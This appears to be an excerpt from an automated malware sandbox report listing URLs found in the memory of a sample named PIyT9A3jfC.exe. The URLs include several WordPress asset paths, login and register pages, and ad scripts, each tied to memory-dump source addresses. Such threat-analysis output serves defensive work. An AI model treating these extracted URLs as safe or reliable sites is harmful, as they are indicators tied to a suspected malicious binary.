                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/uploads/pictures/resized/20130412103548_WG-abends_105x150-aspect-w
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/uploads/pictures/resized/20130422130443_Romantik-Arrangement02_105
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hotel-amadeus-frankfurt.de/zh
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589220867.0000000008000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hummer.hu/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687999536.000000000770E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.cdnpark.com/themes/registrar/511803.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.669856256.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://matrix-cms.de/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/login/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/register/
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pcgrate.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?ve
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.14
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.14.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.14.1
